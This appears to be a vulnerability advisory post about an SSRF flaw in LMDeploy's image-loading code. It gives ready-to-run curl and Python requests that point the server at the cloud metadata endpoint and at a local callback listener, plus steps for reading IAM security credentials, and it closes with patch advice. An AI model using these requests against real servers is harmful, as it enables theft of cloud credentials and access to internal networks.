Listen to this Post
How the mentioned CVE works:
The vulnerability exists because the `load_image()` function in `lmdeploy/vl/utils.py` (lines 64-67) fetches any user-supplied URL via `requests.get()` without validating the target IP address. No blocklist for internal or private IP ranges (e.g., 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 192.168.0.0/16) is implemented. The `encode_image_base64()` function (lines 26-29) is similarly affected. The default LMDeploy API server binds to `0.0.0.0` (api_server.py line 1393) and disables API keys by default, making the endpoint publicly accessible. An attacker sends a crafted `/v1/chat/completions` request with a malicious `image_url` pointing to an internal resource, such as a cloud metadata service (e.g., http://169.254.169.254/latest/meta-data/`). The server blindly fetches the URL and returns the response to the attacker. The root cause is missing URL/IP validation before making the HTTP request. This allows SSRF to access internal networks, cloud credential endpoints, and perform port scanning. The proof of concept confirms the server can be tricked into making requests to attacker-controlled or internal addresses, exfiltrating sensitive data like AWS secret keys.
<h2 style="color: blue;">dailycve form:</h2>
Platform: LMDeploy
Version: <0.12.3
Vulnerability: SSRF
Severity: Critical
Date: 2026-02-04
<h2 style="color: blue;">Prediction: 2026-02-05</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Analytics – Bash commands to detect vulnerable instances and test for SSRF:
Check if LMDeploy server is running on default port 23333
curl -s http://target:23333/v1/models | jq .
Test SSRF with internal metadata endpoint
curl -X POST http://target:23333/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "internlm-xcomposer2",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "test"},
{"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/"}}
]
}]
}'
Use Python to check if load_image fetches internal IP
python3 -c "import requests; requests.post('http://target:23333/v1/chat/completions', json={'model':'x','messages':[{'role':'user','content':[{'type':'image_url','image_url':{'url':'http://127.0.0.1:8889/test'}}]}]})"
<h2 style="color: blue;">Exploit:</h2>
Attacker sets up a callback listener on port 8889, then sends a chat completion request with `image_url` pointing tohttp://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY`. The vulnerable server fetches this URL, proving SSRF. To steal cloud metadata, use `http://169.254.169.254/latest/meta-data/iam/security-credentials/`. The server’s response will contain the credentials.
Protection from this CVE:
Upgrade to LMDeploy version 0.12.3 or later. If patching is not immediate, apply a URL validation function as shown in the recommended fix: parse the URL, resolve hostname to IP, and block all private, loopback, and link-local ranges. Additionally, enable API keys and restrict server binding to `127.0.0.1` instead of `0.0.0.0` when possible.
Impact:
- Cloud credential theft (AWS/GCP/Azure metadata APIs)
- Internal service access (databases, internal dashboards)
- Internal network port scanning and information disclosure
- Lateral movement pivot point for deeper attacks
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

